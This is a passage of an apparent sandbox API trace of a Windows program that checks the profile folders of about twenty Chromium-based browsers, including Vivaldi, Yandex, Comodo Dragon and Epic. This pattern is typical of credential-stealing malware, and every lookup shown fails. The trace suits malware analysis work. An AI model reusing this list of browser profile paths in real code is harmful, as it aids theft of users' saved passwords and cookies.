lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x36 [0208.657] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.659] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.659] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data") returned 0x37 [0208.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.659] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x36 [0208.660] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.661] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.661] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data") returned 0x32 [0208.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.662] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x31 [0208.662] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.663] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.664] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data") returned 0x33 [0208.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.664] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x32 [0208.664] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.666] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.666] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data") returned 0x32 [0208.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.666] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x31 [0208.666] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.668] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.668] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data") returned 0x3c [0208.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.668] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3b [0208.669] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.671] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.671] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data") returned 0x40 [0208.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.671] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x3f [0208.671] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.673] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.673] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned 0x3a [0208.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.673] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x39 [0208.673] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.674] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.674] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer") returned 0x55 [0208.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.675] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x54 [0208.675] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.676] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.676] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data") returned 0x40 [0208.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.677] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x3f [0208.718] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.720] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.720] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data") returned 0x39 [0208.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.720] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x38 [0208.721] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.722] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.723] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\liebao\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data") returned 0x32 [0208.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.723] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x31 [0208.723] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.725] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.725] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data") returned 0x34 [0208.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.725] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x33 [0208.725] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.727] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.727] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data") returned 0x33 [0208.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.728] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x32 [0208.728] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.729] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.730] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data") returned 0x39 [0208.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.730] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x38 [0208.730] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.732] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.732] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data") returned 0x36 [0208.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.732] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", lpFilePart=0x0) returned 0x35 [0208.732] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.734] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.734] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Torch\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data") returned 0x31 [0208.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.734] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x30 [0208.734] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.736] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.736] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data") returned 0x40 [0208.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.736] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x3f [0208.737] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.738] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.738] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data") returned 0x32 [0208.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.739] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", lpFilePart=0x0) returned 0x31 [0208.739] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, 